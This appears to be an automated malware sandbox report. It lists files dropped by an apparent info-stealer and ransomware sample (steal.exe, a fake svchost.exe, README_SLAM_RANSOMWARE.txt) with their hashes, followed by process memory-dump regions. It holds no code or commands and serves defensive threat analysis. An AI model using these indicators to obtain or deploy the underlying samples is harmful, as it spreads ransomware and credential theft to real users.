c658ac0aa5c753c17a02231ff51f20aa34ab211f6a442e6965ea13fc4d7f28e7c99e7a4bc6c912ea7252ae5f3a29ba2810d2481ca01f91b34dd9c00dd3805409

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
640KB

MD5
4cdffde5af820813f95704bc900170d6

SHA1
60f1c669ee3c64d77b2f2f7a4b080106fde26a91

SHA256
df3dc5d6fcaf6734b5abd9748b04335cf3fb84c780c48c8f3e6521b6269c3a9d

SHA512
f1d595a58ad0efed953a8dc20cc1dda25281a541ec0ec7376291053a2f7ef48b6389484d5815ab015478cf675df8ee6f047a9ec09f39961c5f60e3838ae24628

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
896KB

MD5
8820aa9a4bbb1e78a716b10c852f7fbb

SHA1
462fc5e0a1da5835cf0a23c6c332858c68177a91

SHA256
1f4e8918d9e5e3e39d3f72ae6b500648cfc1a471a9a0554c1df99bacefdbc72b

SHA512
25e5f89dbb0715f24b18ede31b426ffb676fed34bcd3b13863b581171a8f20d4e519e58f1f0f60ffc1c32265da6a926e0f322de57a2a7b95ceaa7d5e447d835c

Download Submit
C:\Users\Admin\AppData\Roaming\settings.bat

Filesize
67B

MD5
a204d9e5059a5449af7af765d371d6ea

SHA1
cfc6f78545bdc6a1c82491500f1bacfb38bef28c

SHA256
d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

SHA512
d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
3.2MB

MD5
e014c65de622d48ca030cd704136dad5

SHA1
4baedefc8147b4a2de3b2c0e3306186ba3a61fe0

SHA256
21f2b86250279393d46349714b02da2a8ef031c1424102cc16afcfcf2e019d34

SHA512
4bb0af4cf14ae236c8c3fb6413573ebdea773c21d5b41242e3aa89a7271734cb1ee3270a2e05c7023feaad16210649b26bd8e35d0e9a4a7759c0b521e54aeea3

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
960KB

MD5
9567f0f5b939a6e593d2ac92710c4127

SHA1
8286e8a1c128722cdbec20fd156601da3968a981

SHA256
c74fdc61d5d116df4a6900735400f165465f6e87854ba4ab74c69369c13b6144

SHA512
07564bf28b02c93efc34dce91053000253a2909f9bed30f21db3bc6ccee00d0d9c6c33da0b5efaa5eb045b7f200424f9510b00b7364fdbcdb469764036540e28

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
448KB

MD5
b0d4c7668c2f64919ee16b6aee241b3f

SHA1
2fd5879b490b015414eb9d44f5504f96de3667e6

SHA256
f270d0e56ac934c369b3a36c310426b04fbd761edb04be13c1aeac1d9752b451

SHA512
cb736a6ad3a796a0f3b0f05c1698854b72e78db09d42dc58260b711208c71d41fa50c77b8aea008d3aa45e8a891f32a0d2aab8c65f8521459a08574f1e1ee2a0

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
5.1MB

MD5
0032843e0175e953ee0cc7ea29acd401

SHA1
7144d5c344f0712c1f2c9627605743b1e35deae1

SHA256
6e5ec88e13d76298c267ede13e957e3a908c8c79856021b40385f3e02f905342

SHA512
aad41cb233548225976dfeba988d5f046e36c2912fda316620207c15f3b778c671294425b148f814663778e91cb135e901a079ae606eb5ccb6856af73cc0125e

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
41KB

MD5
84177654d8bbd32fe8132265e7a598ec

SHA1
73bbb239d1449b3af2d7f53614ba456c1add4c9a

SHA256
af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

SHA512
6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

Download Submit
C:\Users\Admin\AppData\Roaming\ucrtbased.dll

Filesize
1.4MB

MD5
ceeda0b23cdf173bf54f7841c8828b43

SHA1
1742f10b0c1d1281e5dec67a9f6659c8816738ad

SHA256
c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

SHA512
f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

Download Submit
C:\Users\Admin\AppData\Roaming\vcruntime140d.dll

Filesize
111KB

MD5
b59b0f6193bcc7e78a3b2fc730196be3

SHA1
045469fec2df2a9c75b550984a0ed32db2e9f846

SHA256
003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

SHA512
73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\README_SLAM_RANSOMWARE.txt

Filesize
2KB

MD5
4c5c69009196770ca26cba9320b3c2eb

SHA1
710d71fb87116c8bc9a06621417413324c5962d2

SHA256
cd44e33c820e0319e8cddaeb18f3530f35fed2bbc3ff0eaeb57d8a828aba9d27

SHA512
4a1494f416edf855a8fcb3606b338873162d9f99492cfa19116ec73ee485f7a51252d7dd36881b480b8e820a2146ed59fabfca6f5148618f9666cfafe06fb7c1

Download Submit
memory/764-584-0x0000000000910000-0x0000000000C46000-memory.dmp

Filesize
3.2MB

Download
memory/764-593-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/764-585-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/764-588-0x0000000005510000-0x0000000005520000-memory.dmp

Filesize
64KB

Download
memory/1692-512-0x00007FFB4E4B0000-0x00007FFB4EF71000-memory.dmp

Filesize
10.8MB

Download
memory/1692-520-0x0000000000120000-0x0000000000444000-memory.dmp

Filesize
3.1MB

Download
memory/1692-859-0x000000001B000000-0x000000001B010000-memory.dmp

Filesize
64KB

Download
memory/1692-896-0x000000001C0F0000-0x000000001C618000-memory.dmp

Filesize
5.2MB

Download
memory/1692-591-0x000000001B5C0000-0x000000001B672000-memory.dmp

Filesize
712KB

Download
memory/1692-857-0x00007FFB4E4B0000-0x00007FFB4EF71000-memory.dmp

Filesize
10.8MB

Download
memory/1692-590-0x000000001AFB0000-0x000000001B000000-memory.dmp

Filesize
320KB

Download
memory/1692-534-0x000000001B000000-0x000000001B010000-memory.dmp

Filesize
64KB

Download
memory/2908-316-0x0000000000DC0000-0x0000000000DE0000-memory.dmp

Filesize
128KB

Download
memory/2908-20-0x0000000000DC0000-0x0000000000DE0000-memory.dmp

Filesize
128KB

Download
memory/3488-44-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/3768-904-0x0000000000970000-0x000000000097A000-memory.dmp

Filesize
40KB

Download
memory/4324-43-0x000001F731A20000-0x000001F731A30000-memory.dmp

Filesize
64KB

Download
memory/4324-365-0x00007FFB4E4B0000-0x00007FFB4EF71000-memory.dmp

Filesize
10.8MB

Download
memory/4324-45-0x00007FFB4E4B0000-0x00007FFB4EF71000-memory.dmp

Filesize
10.8MB

Download
memory/4720-521-0x0000000006740000-0x0000000006750000-memory.dmp

Filesize
64KB

Download
memory/4720-856-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/4720-490-0x0000000000F00000-0x0000000001E1A000-memory.dmp

Filesize
15.1MB

Download
memory/4720-472-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/4720-740-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/4840-404-0x000000000BF70000-0x000000000BF92000-memory.dmp

Filesize
136KB

Download
memory/4840-296-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-0-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/4840-400-0x000000000C020000-0x000000000C0D0000-memory.dmp

Filesize
704KB

Download
memory/4840-403-0x000000000BE30000-0x000000000BE96000-memory.dmp

Filesize
408KB

Download
memory/4840-540-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-1-0x00000000007D0000-0x000000000316A000-memory.dmp

Filesize
41.6MB

Download
memory/4840-2-0x00000000081D0000-0x0000000008774000-memory.dmp

Filesize
5.6MB

Download
memory/4840-860-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-3-0x0000000007B40000-0x0000000007BD2000-memory.dmp

Filesize
584KB

Download
memory/4840-4-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-5-0x0000000007C00000-0x0000000007C0A000-memory.dmp

Filesize
40KB

Download
memory/4840-396-0x000000000BED0000-0x000000000BF6C000-memory.dmp

Filesize
624KB

Download
memory/4840-6-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-237-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/4840-264-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/4840-405-0x000000000C2D0000-0x000000000C624000-memory.dmp

Filesize
3.3MB

Download
memory/5060-741-0x0000000002A20000-0x0000000002A30000-memory.dmp

Filesize
64KB

Download
memory/5060-766-0x0000000007990000-0x00000000079A4000-memory.dmp

Filesize
80KB

Download
memory/5060-728-0x000000006E520000-0x000000006E56C000-memory.dmp

Filesize
304KB

Download
memory/5060-739-0x0000000007430000-0x00000000074D3000-memory.dmp

Filesize
652KB

Download
memory/5060-727-0x00000000073F0000-0x0000000007422000-memory.dmp

Filesize
200KB

Download
memory/5060-742-0x0000000007D90000-0x000000000840A000-memory.dmp

Filesize
6.5MB

Download
memory/5060-743-0x0000000007750000-0x000000000776A000-memory.dmp

Filesize
104KB

Download
memory/5060-762-0x00000000077C0000-0x00000000077CA000-memory.dmp

Filesize
40KB

Download
memory/5060-763-0x00000000079D0000-0x0000000007A66000-memory.dmp

Filesize
600KB

Download
memory/5060-764-0x0000000007950000-0x0000000007961000-memory.dmp

Filesize
68KB

Download
memory/5060-765-0x0000000007980000-0x000000000798E000-memory.dmp

Filesize
56KB

Download
memory/5060-738-0x00000000069D0000-0x00000000069EE000-memory.dmp

Filesize
120KB

Download
memory/5060-767-0x0000000007A90000-0x0000000007AAA000-memory.dmp

Filesize
104KB

Download
memory/5060-768-0x0000000007A70000-0x0000000007A78000-memory.dmp

Filesize
32KB

Download
memory/5060-771-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/5060-726-0x000000007FBD0000-0x000000007FBE0000-memory.dmp

Filesize
64KB

Download
memory/5060-725-0x00000000064C0000-0x000000000650C000-memory.dmp

Filesize
304KB

Download
memory/5060-724-0x0000000006430000-0x000000000644E000-memory.dmp

Filesize
120KB

Download
memory/5060-714-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/5060-712-0x0000000002A20000-0x0000000002A30000-memory.dmp

Filesize
64KB

Download
memory/5060-710-0x0000000002A20000-0x0000000002A30000-memory.dmp

Filesize
64KB

Download
memory/5060-711-0x00000000054F0000-0x0000000005B18000-memory.dmp

Filesize
6.2MB

Download
memory/5060-709-0x00000000747A0000-0x0000000074F50000-memory.dmp

Filesize
7.7MB

Download
memory/5060-706-0x0000000004E80000-0x0000000004EB6000-memory.dmp

Filesize
216KB

Download